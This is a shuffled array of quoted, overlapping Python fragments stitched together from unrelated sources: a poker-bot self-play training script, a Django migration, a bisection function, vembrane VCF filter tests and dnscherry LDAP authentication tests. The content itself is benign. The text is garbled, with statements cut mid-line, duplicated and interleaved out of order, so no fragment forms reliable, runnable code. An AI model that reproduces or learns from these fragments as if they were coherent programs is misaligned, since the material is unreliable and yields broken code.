"if len(hand_saldo) == 0: hand_saldo = [0, 0] hand_saldo[state.player_to_act] = state.stack_size - state.start_stack_size",
"\"wanted to fold - randomizing action ******\") winn = [0, 0] winn[state.player_to_act] =",
"play_hand(gym, model0, rnd_odds0, model1, rnd_odds1, what_if_play) total_saldo[0] += saldo[0] total_saldo[1] += saldo[1] print(\"Avg",
"if state.player_to_act == 0: all_states.append(state) all_actions.append(action_ind) print(\"Calculated action:\", action, ammount) state = gym.act(action,",
"#if (saldos[j][0] < 0): # real_epochs *= 2 start_time = time.time() m1.train_model(training_model, states[j],",
"\"model_1_lvl_01.h5\", \"model_1_lvl_02.h5\"], [100, 0, 0, 0]) opp_models, rnd_odds, opp_name = load_opp_models([\"model_1_lvl_01.h5\"], [0]) num_iters",
"#saldos.append(saldo) if saldo[0] < saldo_limit_for_next_lvl: go_to_next_level = False print(\"Played\", num_hands, \"hands in\", round(elapsed_time),",
"time.time() - start_time print(\"Trained\", real_epochs, \"epochs in\", round(elapsed_time), \"seconds\", round(elapsed_time / real_epochs, 2),",
"f.flush() states = [] actions = [] winnings = [] #saldos = []",
"m1.create_model_1() training_model.load_weights(\"weights0012.h5\") training_model_rnd_odds = 5 #opp_models, rnd_odds, opp_name = load_opp_models([\"model_1_lvl_00.h5\", \"model_1_lvl_00.h5\", \"model_1_lvl_01.h5\", \"model_1_lvl_02.h5\"],",
"len(opp_models) > max_opp_models: opp_models.pop(0) rnd_odds.pop(0) opp_name.pop(0) # Make new training model. Continue where",
"rnd_odds, opp_name = load_opp_models([\"model_1_lvl_01.h5\"], [0]) num_iters = 50000 num_hands = 4000 what_if_play =",
"True do_training = True training_epochs = 30 # Leveling params saldo_limit_for_next_lvl = 200",
"= 200 next_level = 4 max_opp_models = 20 for i in range(num_iters): print(\"\\nIteration:\",",
"file_name = \"weights\" + str(i).zfill(4) + \".h5\" training_model.save_weights(file_name) print(\"\\nSaved weights:\", file_name, file=f) f.flush()",
"hand_saldo) return all_states, all_actions, all_winnings, hand_saldo def play_manu_hands(gym, model0, rnd_odds0, model1, rnd_odds1, num_hands,",
"= True # Play against opp models for j in range(len(opp_models)): print(\"Playing vs\",",
"range(len(states)): real_epochs = training_epochs #if (saldos[j][0] < 0): # real_epochs *= 2 start_time",
"[0, 0] hand_saldo[state.player_to_act] = state.stack_size - state.start_stack_size hand_saldo[state.other_player_ind] = -hand_saldo[state.player_to_act] print(\"Hand saldo at",
"else: [action, action_ind], ammount = m1.calculate_action(model1, state, rnd_odds1) is_fake_action = False # In",
"act, winn, saldo = play_manu_hands(gym, training_model, training_model_rnd_odds, opp_models[j], rnd_odds[j], num_hands=num_hands, what_if_play=what_if_play) elapsed_time =",
"len(all_winnings) < len(all_states): id = len(all_winnings) player_id = all_states[id].player_to_act all_winnings.append(winnings[player_id]) def play_hand(gym, model0,",
"= m1.calculate_action(model0, state, rnd_odds0) else: [action, action_ind], ammount = m1.calculate_action(model1, state, rnd_odds1) is_fake_action",
"0] winn[state.player_to_act] = 0 winn[state.other_player_ind] = state.pot_size print(\"Winnings:\", winn) append_winnings(all_states, all_winnings, winn) if",
"score: \", total_saldo[1], \"per hand\") print(\"\") print(\"Colected \", len(all_states), \" data pairs for",
"5 #opp_models, rnd_odds, opp_name = load_opp_models([\"model_1_lvl_00.h5\", \"model_1_lvl_00.h5\", \"model_1_lvl_01.h5\", \"model_1_lvl_02.h5\"], [100, 0, 0, 0])",
"[] all_actions = [] all_winnings = [] hand_saldo = [] while state.status !=",
"print(\"All winings:\", all_winnings) if len(hand_saldo) == 0: hand_saldo = [state.saldo[0], state.saldo[1]] print(\"Taking state",
"m1.create_model_1() training_model.load_weights(file_name) if do_training: print(\"Now training\\n\", file=f) f.flush() for j in range(len(states)): real_epochs",
"winn = [0, 0] winn[state.player_to_act] = 0 winn[state.other_player_ind] = state.pot_size print(\"Winnings:\", winn) append_winnings(all_states,",
"= True do_training = True training_epochs = 30 # Leveling params saldo_limit_for_next_lvl =",
"= time.time() - start_time states.append(st) actions.append(act) winnings.append(winn) #saldos.append(saldo) if saldo[0] < saldo_limit_for_next_lvl: go_to_next_level",
"print(\"\") print(\"Bot 0 score: \", total_saldo[0], \"per hand\") print(\"Bot 1 score: \", total_saldo[1],",
"all_winnings = [] hand_saldo = [] while state.status != \"hand_finished\": if state.player_to_act ==",
"vs\", opp_name[j], file=f) f.flush() start_time = time.time() st, act, winn, saldo = play_manu_hands(gym,",
"= play_manu_hands(gym, training_model, training_model_rnd_odds, opp_models[j], rnd_odds[j], num_hands=num_hands, what_if_play=what_if_play) elapsed_time = time.time() - start_time",
"models, rnd_odds, opp_names gym = load_gym() f = open(\"log.txt\", \"w\") training_model = m1.create_model_1()",
"print(\"Hand saldo at the moment of first fold:\", hand_saldo) # randomize new action",
"str(next_level).zfill(2) + \".h5\" print(\"Went to next level:\", file_name, \"\\n\", file=f) f.flush() training_model.save_weights(file_name) next_level",
"to next level:\", file_name, \"\\n\", file=f) f.flush() training_model.save_weights(file_name) next_level += 1 # Push",
"winnings, saldo = play_hand(gym, model0, rnd_odds0, model1, rnd_odds1, what_if_play) total_saldo[0] += saldo[0] total_saldo[1]",
"\"epochs in\", round(elapsed_time), \"seconds\", round(elapsed_time / real_epochs, 2), \"seconds per epoch\", file=f) f.flush()",
"is_fake_action) append_winnings(all_states, all_winnings, state.winnings) print(\"All winings:\", all_winnings) if len(hand_saldo) == 0: hand_saldo =",
"time from load_gym import load_gym import action_helpers as ah import dl_model_1 as m1",
"model0, rnd_odds0, model1, rnd_odds1, what_if_play) total_saldo[0] += saldo[0] total_saldo[1] += saldo[1] print(\"Avg saldo",
"all_winnings, hand_saldo def play_manu_hands(gym, model0, rnd_odds0, model1, rnd_odds1, num_hands, what_if_play): all_states = []",
"saldo_limit_for_next_lvl = 200 next_level = 4 max_opp_models = 20 for i in range(num_iters):",
"opp_names gym = load_gym() f = open(\"log.txt\", \"w\") training_model = m1.create_model_1() training_model.load_weights(\"weights0012.h5\") training_model_rnd_odds",
"fold - randomizing action ******\") winn = [0, 0] winn[state.player_to_act] = 0 winn[state.other_player_ind]",
"state.player_to_act, \"wanted to fold - randomizing action ******\") winn = [0, 0] winn[state.player_to_act]",
"[] while state.status != \"hand_finished\": if state.player_to_act == 0: [action, action_ind], ammount =",
"all_actions, all_winnings, total_saldo def load_opp_models(model_paths, rnd_odds): models = [] opp_names = [] for",
"winnings): while len(all_winnings) < len(all_states): id = len(all_winnings) player_id = all_states[id].player_to_act all_winnings.append(winnings[player_id]) def",
"in range(num_hands): print(\"\") print(\"Hand: \", i) states, actions, winnings, saldo = play_hand(gym, model0,",
"= [0, 0] winn[state.player_to_act] = 0 winn[state.other_player_ind] = state.pot_size print(\"Winnings:\", winn) append_winnings(all_states, all_winnings,",
"file=f) print(\"Saldo vs\", opp_name[j], saldo, \"\\n\", file=f) f.flush() if do_training and go_to_next_level: file_name",
"== 0: all_states.append(state) all_actions.append(action_ind) print(\"Calculated action:\", action, ammount) state = gym.act(action, ammount, is_fake_action)",
"training_model_rnd_odds = 5 #opp_models, rnd_odds, opp_name = load_opp_models([\"model_1_lvl_00.h5\", \"model_1_lvl_00.h5\", \"model_1_lvl_01.h5\", \"model_1_lvl_02.h5\"], [100, 0,",
"against opp models for j in range(len(opp_models)): print(\"Playing vs\", opp_name[j], file=f) f.flush() start_time",
"# In case of fold we can continue playing... if (action == ah.ACTION_FOLD[0])",
"hand_saldo = [] while state.status != \"hand_finished\": if state.player_to_act == 0: [action, action_ind],",
"for winn in winnings: all_winnings.append(winn) total_saldo[0] /= num_hands total_saldo[1] /= num_hands print(\"\") print(\"Bot",
"elapsed_time / num_hands), \"ms per hand\", file=f) print(\"Saldo vs\", opp_name[j], saldo, \"\\n\", file=f)",
"[] opp_names = [] for i in range(len(model_paths)): opp_model = m1.create_model_1() opp_model.load_weights(model_paths[i]) models.append(opp_model)",
"states = [] actions = [] winnings = [] #saldos = [] go_to_next_level",
"state.stack_size - state.start_stack_size hand_saldo[state.other_player_ind] = -hand_saldo[state.player_to_act] print(\"Hand saldo at the moment of first",
"model1, rnd_odds1, what_if_play): state = gym.startHand() all_states = [] all_actions = [] all_winnings",
"if do_training and go_to_next_level: file_name = \"model_1_lvl_\" + str(next_level).zfill(2) + \".h5\" print(\"Went to",
"round(elapsed_time / real_epochs, 2), \"seconds per epoch\", file=f) f.flush() file_name = \"weights\" +",
"round(elapsed_time), \"seconds\", round(1000 * elapsed_time / num_hands), \"ms per hand\", file=f) print(\"Saldo vs\",",
"print(\"Bot 1 score: \", total_saldo[1], \"per hand\") print(\"\") print(\"Colected \", len(all_states), \" data",
"state.winnings) print(\"All winings:\", all_winnings) if len(hand_saldo) == 0: hand_saldo = [state.saldo[0], state.saldo[1]] print(\"Taking",
"what_if_play): all_states = [] all_actions = [] all_winnings = [] total_saldo = [0,",
"Make new training model. Continue where last one left off training_model = m1.create_model_1()",
"= [] total_saldo = [0, 0] for i in range(num_hands): print(\"\") print(\"Hand: \",",
"state.player_to_act == 0: all_states.append(state) all_actions.append(action_ind) print(\"Calculated action:\", action, ammount) state = gym.act(action, ammount,",
"action, ammount) state = gym.act(action, ammount, is_fake_action) append_winnings(all_states, all_winnings, state.winnings) print(\"All winings:\", all_winnings)",
"(saldos[j][0] < 0): # real_epochs *= 2 start_time = time.time() m1.train_model(training_model, states[j], actions[j],",
"= \"model_1_lvl_\" + str(next_level).zfill(2) + \".h5\" print(\"Went to next level:\", file_name, \"\\n\", file=f)",
"real_epochs *= 2 start_time = time.time() m1.train_model(training_model, states[j], actions[j], winnings[j], batch_size=128, validation_split=0.1, epochs=real_epochs)",
"actions: all_actions.append(act) for winn in winnings: all_winnings.append(winn) total_saldo[0] /= num_hands total_saldo[1] /= num_hands",
"all_winnings, total_saldo def load_opp_models(model_paths, rnd_odds): models = [] opp_names = [] for i",
"2), \"seconds per epoch\", file=f) f.flush() file_name = \"weights\" + str(i).zfill(4) + \".h5\"",
"== 0: [action, action_ind], ammount = m1.calculate_action(model0, state, rnd_odds0) else: [action, action_ind], ammount",
"hand_saldo) # randomize new action and continue playing... [action, action_ind], ammount = ah.randomize_action(state.pot_size,",
"ah.ACTION_FOLD[0]) and what_if_play: print(\"Player:\", state.player_to_act, \"wanted to fold - randomizing action ******\") winn",
"do_training = True training_epochs = 30 # Leveling params saldo_limit_for_next_lvl = 200 next_level",
"i in range(num_iters): print(\"\\nIteration:\", i, \"\\n\", file=f) f.flush() states = [] actions =",
"models for j in range(len(opp_models)): print(\"Playing vs\", opp_name[j], file=f) f.flush() start_time = time.time()",
"case of fold we can continue playing... if (action == ah.ACTION_FOLD[0]) and what_if_play:",
"= True if state.player_to_act == 0: all_states.append(state) all_actions.append(action_ind) print(\"Calculated action:\", action, ammount) state",
"rnd_odds1) is_fake_action = False # In case of fold we can continue playing...",
"[] winnings = [] #saldos = [] go_to_next_level = True # Play against",
"/= num_hands total_saldo[1] /= num_hands print(\"\") print(\"Bot 0 score: \", total_saldo[0], \"per hand\")",
"next_level = 4 max_opp_models = 20 for i in range(num_iters): print(\"\\nIteration:\", i, \"\\n\",",
"actions[j], winnings[j], batch_size=128, validation_split=0.1, epochs=real_epochs) elapsed_time = time.time() - start_time print(\"Trained\", real_epochs, \"epochs",
"all_actions = [] all_winnings = [] hand_saldo = [] while state.status != \"hand_finished\":",
"total_saldo[0] /= num_hands total_saldo[1] /= num_hands print(\"\") print(\"Bot 0 score: \", total_saldo[0], \"per",
"= [] #saldos = [] go_to_next_level = True # Play against opp models",
"models = [] opp_names = [] for i in range(len(model_paths)): opp_model = m1.create_model_1()",
"file=f) f.flush() if do_training and go_to_next_level: file_name = \"model_1_lvl_\" + str(next_level).zfill(2) + \".h5\"",
"rnd_odds.append(0) opp_name.append(file_name) if len(opp_models) > max_opp_models: opp_models.pop(0) rnd_odds.pop(0) opp_name.pop(0) # Make new training",
"in winnings: all_winnings.append(winn) total_saldo[0] /= num_hands total_saldo[1] /= num_hands print(\"\") print(\"Bot 0 score:",
"winn in winnings: all_winnings.append(winn) total_saldo[0] /= num_hands total_saldo[1] /= num_hands print(\"\") print(\"Bot 0",
"play_manu_hands(gym, training_model, training_model_rnd_odds, opp_models[j], rnd_odds[j], num_hands=num_hands, what_if_play=what_if_play) elapsed_time = time.time() - start_time states.append(st)",
"total_saldo[1] += saldo[1] print(\"Avg saldo per hand:\", round(total_saldo[0] / (i + 1), 2),",
"all_winnings.append(winn) total_saldo[0] /= num_hands total_saldo[1] /= num_hands print(\"\") print(\"Bot 0 score: \", total_saldo[0],",
"30 # Leveling params saldo_limit_for_next_lvl = 200 next_level = 4 max_opp_models = 20",
"num_hands=num_hands, what_if_play=what_if_play) elapsed_time = time.time() - start_time states.append(st) actions.append(act) winnings.append(winn) #saldos.append(saldo) if saldo[0]",
"fold we can continue playing... if (action == ah.ACTION_FOLD[0]) and what_if_play: print(\"Player:\", state.player_to_act,",
"- start_time states.append(st) actions.append(act) winnings.append(winn) #saldos.append(saldo) if saldo[0] < saldo_limit_for_next_lvl: go_to_next_level = False",
"100: opp_names.append(\"random\") else: opp_names.append(model_paths[i]) return models, rnd_odds, opp_names gym = load_gym() f =",
"for i in range(num_hands): print(\"\") print(\"Hand: \", i) states, actions, winnings, saldo =",
"state = gym.startHand() all_states = [] all_actions = [] all_winnings = [] hand_saldo",
"in\", round(elapsed_time), \"seconds\", round(elapsed_time / real_epochs, 2), \"seconds per epoch\", file=f) f.flush() file_name",
"elapsed_time = time.time() - start_time states.append(st) actions.append(act) winnings.append(winn) #saldos.append(saldo) if saldo[0] < saldo_limit_for_next_lvl:",
"continue playing... if (action == ah.ACTION_FOLD[0]) and what_if_play: print(\"Player:\", state.player_to_act, \"wanted to fold",
"one left off training_model = m1.create_model_1() training_model.load_weights(file_name) if do_training: print(\"Now training\\n\", file=f) f.flush()",
"+= saldo[1] print(\"Avg saldo per hand:\", round(total_saldo[0] / (i + 1), 2), \",\",",
"state, rnd_odds0) else: [action, action_ind], ammount = m1.calculate_action(model1, state, rnd_odds1) is_fake_action = False",
"[action, action_ind], ammount = ah.randomize_action(state.pot_size, state.ammount_to_call, state.stack_size, never_fold=True) is_fake_action = True if state.player_to_act",
"< 0): # real_epochs *= 2 start_time = time.time() m1.train_model(training_model, states[j], actions[j], winnings[j],",
"all_states, all_actions, all_winnings, total_saldo def load_opp_models(model_paths, rnd_odds): models = [] opp_names = []"
] |
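The pairing step in append_winnings is the heart of the data collection: every stored state is labeled with the eventual payoff of the player who acted in it. Below is a minimal sketch of that behavior, reusing append_winnings from above; the SimpleNamespace stand-ins for the gym's state objects are hypothetical, the real ones come from load_gym.

from types import SimpleNamespace

# Hypothetical stand-in states: player 0 acted in the first, player 1 in the second.
demo_states = [SimpleNamespace(player_to_act=0), SimpleNamespace(player_to_act=1)]
demo_labels = []
append_winnings(demo_states, demo_labels, winnings=[5, -5])
print(demo_labels)  # [5, -5]: each state is paired with its actor's payoff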
# -*- coding: utf-8 -*-
# Generated by Django 1.11 on 2019-10-27 18:49
from __future__ import unicode_literals

from django.db import migrations, models
import django.db.models.deletion


class Migration(migrations.Migration):

    dependencies = [
        ('project', '0003_voting'),
    ]

    operations = [
        migrations.RemoveField(
            model_name='foto',
            name='category',
        ),
        migrations.RemoveField(
            model_name='foto',
            name='designer',
        ),
        migrations.RemoveField(
            model_name='foto',
            name='tags',
        ),
        migrations.AddField(
            model_name='foto',
            name='profiles',
            field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, to='project.Profile'),
        ),
    ]
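This migration drops three fields from Foto and replaces them with a single nullable foreign key. After it is applied, the relevant part of the model would look roughly like the sketch below; the Foto body is a plausible reconstruction for illustration, not the project's actual models.py.

from django.db import models


class Foto(models.Model):
    # category, designer and tags were removed by the migration above;
    # what remains is a nullable link to a Profile.
    profiles = models.ForeignKey('project.Profile', null=True,
                                 on_delete=models.CASCADE)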
#!/usr/bin/env python
import math


def how_many(c, time):
    # Bisection: find n such that n * log2(n) == time / c.
    assert 1 <= c <= 100
    assert 1 <= time <= 2000000000
    left, right = 1, 2000000000
    while right - left >= 1e-9:
        n = (left + right) / 2
        if n * math.log(n, 2) >= time / c:
            right = n
        else:
            left = n
    return left


assert abs(how_many(1, 8) - 4) < 1e-9
assert abs(how_many(2, 16) - 4) < 1e-9
assert abs(how_many(37, 12392342) - 23104.999312341137) < 1e-9
assert abs(how_many(1, 2000000000) - 7.637495090348122e7) < 1e-9
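The bisection solves n * log2(n) = time / c for n, which is why how_many(1, 8) returns 4 (4 * log2(4) = 8). As an independent cross-check, assuming SciPy is available, the same root can be found with scipy.optimize.brentq; how_many_brentq is a name introduced here for illustration.

import math

from scipy.optimize import brentq


def how_many_brentq(c, time):
    # f(n) = n*log2(n) - time/c is negative at n=1 and positive at n=2e9
    # for all allowed inputs, so the bracket is guaranteed to contain the root.
    return brentq(lambda n: n * math.log(n, 2) - time / c, 1, 2000000000)


assert abs(how_many_brentq(1, 8) - 4) < 1e-6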
from pathlib import Path
import os

from pysam import VariantFile
import pytest
import yaml

from vembrane import errors
from vembrane import __version__, filter_vcf

CASES = Path(__file__).parent.joinpath("testcases")


def test_version():
    assert __version__ == "0.1.0"


@pytest.mark.parametrize(
    "testcase", [d for d in os.listdir(CASES) if not d.startswith(".")]
)
def test_filter(testcase):
    path = CASES.joinpath(testcase)
    with open(path.joinpath("config.yaml")) as config_fp:
        config = yaml.load(config_fp, Loader=yaml.FullLoader)

    vcf = VariantFile(path.joinpath("test.vcf"))
    if "raises" in config:
        exception = getattr(errors, config["raises"])
        from vembrane import check_filter_expression

        with pytest.raises(exception):
            # FIXME we have to explicitly check the filter expression here
            # until we change from calling filter_vcf
            # to actually invoking vembrane.main
            check_filter_expression(config.get("filter_expression"))
            list(
                filter_vcf(
                    vcf,
                    config.get("filter_expression"),
                    config.get("ann_key", "ANN"),
                    config.get("keep_unmatched", False),
                )
            )
    else:
        expected = list(VariantFile(path.joinpath("expected.vcf")))
        result = list(
            filter_vcf(
                vcf,
                config.get("filter_expression"),
                config.get("ann_key", "ANN"),
                config.get("keep_unmatched", False),
            )
        )
        assert result == expected
"import pytest import yaml from vembrane import errors from vembrane import __version__, filter_vcf",
"if \"raises\" in config: exception = getattr(errors, config[\"raises\"]) from vembrane import check_filter_expression with",
"\"raises\" in config: exception = getattr(errors, config[\"raises\"]) from vembrane import check_filter_expression with pytest.raises(exception):",
"pysam import VariantFile import pytest import yaml from vembrane import errors from vembrane",
"pathlib import Path import os from pysam import VariantFile import pytest import yaml",
"have to explicitly check the filter expression here # until we change from",
"__version__ == \"0.1.0\" @pytest.mark.parametrize( \"testcase\", [d for d in os.listdir(CASES) if not d.startswith(\".\")]",
"= yaml.load(config_fp, Loader=yaml.FullLoader) vcf = VariantFile(path.joinpath(\"test.vcf\")) if \"raises\" in config: exception = getattr(errors,",
"from calling filter_vcf # to actually invoking vembrane.main check_filter_expression(config.get(\"filter_expression\")) list( filter_vcf( vcf, config.get(\"filter_expression\"),",
"expected = list(VariantFile(path.joinpath(\"expected.vcf\"))) result = list( filter_vcf( vcf, config.get(\"filter_expression\"), config.get(\"ann_key\", \"ANN\"), config.get(\"keep_unmatched\", False),",
"in config: exception = getattr(errors, config[\"raises\"]) from vembrane import check_filter_expression with pytest.raises(exception): #",
"= CASES.joinpath(testcase) with open(path.joinpath(\"config.yaml\")) as config_fp: config = yaml.load(config_fp, Loader=yaml.FullLoader) vcf = VariantFile(path.joinpath(\"test.vcf\"))",
"Path import os from pysam import VariantFile import pytest import yaml from vembrane",
"expression here # until we change from calling filter_vcf # to actually invoking",
"CASES = Path(__file__).parent.joinpath(\"testcases\") def test_version(): assert __version__ == \"0.1.0\" @pytest.mark.parametrize( \"testcase\", [d for",
"os from pysam import VariantFile import pytest import yaml from vembrane import errors",
"pytest.raises(exception): # FIXME we have to explicitly check the filter expression here #",
"FIXME we have to explicitly check the filter expression here # until we",
"# to actually invoking vembrane.main check_filter_expression(config.get(\"filter_expression\")) list( filter_vcf( vcf, config.get(\"filter_expression\"), config.get(\"ann_key\", \"ANN\"), config.get(\"keep_unmatched\",",
"def test_version(): assert __version__ == \"0.1.0\" @pytest.mark.parametrize( \"testcase\", [d for d in os.listdir(CASES)",
"\"testcase\", [d for d in os.listdir(CASES) if not d.startswith(\".\")] ) def test_filter(testcase): path",
"calling filter_vcf # to actually invoking vembrane.main check_filter_expression(config.get(\"filter_expression\")) list( filter_vcf( vcf, config.get(\"filter_expression\"), config.get(\"ann_key\",",
"import __version__, filter_vcf CASES = Path(__file__).parent.joinpath(\"testcases\") def test_version(): assert __version__ == \"0.1.0\" @pytest.mark.parametrize(",
"if not d.startswith(\".\")] ) def test_filter(testcase): path = CASES.joinpath(testcase) with open(path.joinpath(\"config.yaml\")) as config_fp:",
"\"0.1.0\" @pytest.mark.parametrize( \"testcase\", [d for d in os.listdir(CASES) if not d.startswith(\".\")] ) def",
"import check_filter_expression with pytest.raises(exception): # FIXME we have to explicitly check the filter",
"d.startswith(\".\")] ) def test_filter(testcase): path = CASES.joinpath(testcase) with open(path.joinpath(\"config.yaml\")) as config_fp: config =",
"\"ANN\"), config.get(\"keep_unmatched\", False), ) ) else: expected = list(VariantFile(path.joinpath(\"expected.vcf\"))) result = list( filter_vcf("
] |
[
"inv.bindpassword) except ldap.SERVER_DOWN as e: assert e[0]['info'] == 'TLS: hostname does not match",
"'sn'] class TestError(object): def testNominal(self): inv = Auth(cfg, cherrypy.log) return True def testConnectSSLNoCheck(self):",
"'TLS: hostname does not match CN in peer certificate' def testConnectStartTLS(self): cfg2 =",
"peer certificate' def testConnectStartTLS(self): cfg2 = cfg.copy() cfg2['uri'] = 'ldap://ldap.dnscherry.org:390' cfg2['checkcert'] = 'off'",
"Auth(cfg, cherrypy.log) return True def testConnectSSLNoCheck(self): cfg2 = cfg.copy() cfg2['uri'] = 'ldaps://ldap.dnscherry.org:636' cfg2['checkcert']",
"= inv._connect() ldap.simple_bind_s(inv.binddn, inv.bindpassword) def testConnect(self): inv = Auth(cfg, cherrypy.log) ldap = inv._connect()",
"severity=logging.INFO, traceback=False): pass cherrypy.log.error = syslog_error attr = ['shéll', 'shell', 'cn', 'uid', 'uidNumber',",
"'cn=dnscherry,dc=example,dc=org', 'auth.ldap.bindpassword': 'password', 'auth.ldap.uri': 'ldap://ldap.dnscherry.org:389', 'auth.ldap.ca': './tests/test_env/etc/dnscherry/TEST-cacert.pem', 'auth.ldap.starttls': 'off', 'auth.ldap.checkcert': 'off', 'auth.ldap.user.filter.tmpl': '(uid=%(login)s)',",
"= 'ldaps://notaldap:636' cfg2['checkcert'] = 'on' inv = Auth(cfg2, cherrypy.log) try: ldapc = inv._connect()",
"True def testAuthFailure(self): inv = Auth(cfg, cherrypy.log) res = inv.check_credentials('notauser', 'password') or inv.check_credentials('jwatson',",
"def syslog_error(msg='', context='', severity=logging.INFO, traceback=False): pass cherrypy.log.error = syslog_error attr = ['shéll', 'shell',",
"import ldap cfg = { 'auth.ldap.module': 'dnscherry.backend.ldap', 'auth.ldap.groupdn': 'ou=groups,dc=example,dc=org', 'auth.ldap.userdn': 'ou=People,dc=example,dc=org', 'auth.ldap.binddn': 'cn=dnscherry,dc=example,dc=org',",
"cfg2['checkcert'] = 'on' inv = Auth(cfg2, cherrypy.log) ldap = inv._connect() ldap.simple_bind_s(inv.binddn, inv.bindpassword) def",
"inv = Auth(cfg, cherrypy.log) ldap = inv._connect() ldap.simple_bind_s(inv.binddn, inv.bindpassword) return True def testConnectSSL(self):",
"ldapc.simple_bind_s(inv.binddn, inv.bindpassword) def testAuthSuccess(self): inv = Auth(cfg, cherrypy.log) ret = inv.check_credentials('jwatson', '<PASSWORD>') assert",
"= cfg.copy() cfg2['uri'] = 'ldaps://ldap.dnscherry.org:636' cfg2['checkcert'] = 'on' inv = Auth(cfg2, cherrypy.log) ldap",
"Auth(cfg, cherrypy.log) res = inv.check_credentials('notauser', 'password') or inv.check_credentials('jwatson', '<PASSWORD>') assert res == False",
"= inv._connect() ldap.simple_bind_s(inv.binddn, inv.bindpassword) def testLdapUnavaible(self): cfg2 = cfg.copy() cfg2['uri'] = 'ldaps://notaldap:636' cfg2['checkcert']",
"'off', 'auth.ldap.user.filter.tmpl': '(uid=%(login)s)', 'auth.ldap.group.filter.tmpl': '(member=%(userdn)s)', 'auth.ldap.dn_user_attr': 'uid', 'auth.ldap.group_attr.member': \"%(dn)s\", 'auth.ldap.timeout': 10, } def",
"cfg2['uri'] = 'ldaps://ldap.dnscherry.org:636' cfg2['checkcert'] = 'on' inv = Auth(cfg2, cherrypy.log) ldapc = inv._connect()",
"'off' inv = Auth(cfg2, cherrypy.log) ldap = inv._connect() ldap.simple_bind_s(inv.binddn, inv.bindpassword) def testConnect(self): inv",
"'auth.ldap.binddn': 'cn=dnscherry,dc=example,dc=org', 'auth.ldap.bindpassword': 'password', 'auth.ldap.uri': 'ldap://ldap.dnscherry.org:389', 'auth.ldap.ca': './tests/test_env/etc/dnscherry/TEST-cacert.pem', 'auth.ldap.starttls': 'off', 'auth.ldap.checkcert': 'off', 'auth.ldap.user.filter.tmpl':",
"cfg.copy() cfg2['uri'] = 'ldaps://ldap.dnscherry.org:636' cfg2['checkcert'] = 'off' inv = Auth(cfg2, cherrypy.log) ldap =",
"testNominal(self): inv = Auth(cfg, cherrypy.log) return True def testConnectSSLNoCheck(self): cfg2 = cfg.copy() cfg2['uri']",
"inv = Auth(cfg2, cherrypy.log) ldapc = inv._connect() try: ldapc.simple_bind_s(inv.binddn, inv.bindpassword) except ldap.SERVER_DOWN as",
"cfg2 = cfg.copy() cfg2['uri'] = 'ldaps://ldap.dnscherry.org:636' cfg2['checkcert'] = 'off' inv = Auth(cfg2, cherrypy.log)",
"cherrypy.log.error = syslog_error attr = ['shéll', 'shell', 'cn', 'uid', 'uidNumber', 'gidNumber', 'home', 'userPassword',",
"'ldaps://ldap.dnscherry.org:636' cfg2['checkcert'] = 'off' inv = Auth(cfg2, cherrypy.log) ldap = inv._connect() ldap.simple_bind_s(inv.binddn, inv.bindpassword)",
"'email', 'sn'] class TestError(object): def testNominal(self): inv = Auth(cfg, cherrypy.log) return True def",
"import Auth, CaFileDontExist import cherrypy import logging import ldap cfg = { 'auth.ldap.module':",
"cfg2['uri'] = 'ldaps://notaldap:636' cfg2['checkcert'] = 'on' inv = Auth(cfg2, cherrypy.log) try: ldapc =",
"res == False def testMissingParam(self): cfg2 = {} return True try: inv =",
"ldap = inv._connect() ldap.simple_bind_s(inv.binddn, inv.bindpassword) def testLdapUnavaible(self): cfg2 = cfg.copy() cfg2['uri'] = 'ldaps://notaldap:636'",
"cfg2 = cfg.copy() cfg2['uri'] = 'ldaps://notaldap:636' cfg2['checkcert'] = 'on' inv = Auth(cfg2, cherrypy.log)",
"testConnectSSLWrongCA(self): cfg2 = cfg.copy() cfg2['uri'] = 'ldaps://ldap.dnscherry.org:636' cfg2['checkcert'] = 'on' inv = Auth(cfg2,",
"inv.bindpassword) def testAuthSuccess(self): inv = Auth(cfg, cherrypy.log) ret = inv.check_credentials('jwatson', '<PASSWORD>') assert ret",
"import sys from sets import Set from dnscherry.auth.modLdap import Auth, CaFileDontExist import cherrypy",
"cherrypy.log) ldap = inv._connect() ldap.simple_bind_s(inv.binddn, inv.bindpassword) return True def testConnectSSL(self): cfg2 = cfg.copy()",
"def testNominal(self): inv = Auth(cfg, cherrypy.log) return True def testConnectSSLNoCheck(self): cfg2 = cfg.copy()",
"= 'on' cfg2['ca'] = './test/cfg/ca.crt' inv = Auth(cfg2, cherrypy.log) ldapc = inv._connect() ldapc.simple_bind_s(inv.binddn,",
"import unicode_literals import pytest import sys from sets import Set from dnscherry.auth.modLdap import",
"'auth.ldap.groupdn': 'ou=groups,dc=example,dc=org', 'auth.ldap.userdn': 'ou=People,dc=example,dc=org', 'auth.ldap.binddn': 'cn=dnscherry,dc=example,dc=org', 'auth.ldap.bindpassword': 'password', 'auth.ldap.uri': 'ldap://ldap.dnscherry.org:389', 'auth.ldap.ca': './tests/test_env/etc/dnscherry/TEST-cacert.pem', 'auth.ldap.starttls':",
"def testConnectSSL(self): cfg2 = cfg.copy() cfg2['uri'] = 'ldaps://ldap.dnscherry.org:636' cfg2['checkcert'] = 'on' inv =",
"'password') or inv.check_credentials('jwatson', '<PASSWORD>') assert res == False def testMissingParam(self): cfg2 = {}",
"CaFileDontExist import cherrypy import logging import ldap cfg = { 'auth.ldap.module': 'dnscherry.backend.ldap', 'auth.ldap.groupdn':",
"= Auth(cfg2, cherrypy.log) ldapc = inv._connect() except CaFileDontExist as e: return def testConnectSSLWrongCA(self):",
"inv.check_credentials('jwatson', '<PASSWORD>') assert ret == True def testAuthFailure(self): inv = Auth(cfg, cherrypy.log) res",
"CN in peer certificate' def testConnectStartTLS(self): cfg2 = cfg.copy() cfg2['uri'] = 'ldap://ldap.dnscherry.org:390' cfg2['checkcert']",
"= Auth(cfg2, cherrypy.log) ldapc = inv._connect() try: ldapc.simple_bind_s(inv.binddn, inv.bindpassword) except ldap.SERVER_DOWN as e:",
"with_statement from __future__ import unicode_literals import pytest import sys from sets import Set",
"= inv._connect() ldapc.simple_bind_s(inv.binddn, inv.bindpassword) except ldap.SERVER_DOWN as e: return def testMissingCA(self): cfg2 =",
"= { 'auth.ldap.module': 'dnscherry.backend.ldap', 'auth.ldap.groupdn': 'ou=groups,dc=example,dc=org', 'auth.ldap.userdn': 'ou=People,dc=example,dc=org', 'auth.ldap.binddn': 'cn=dnscherry,dc=example,dc=org', 'auth.ldap.bindpassword': 'password', 'auth.ldap.uri':",
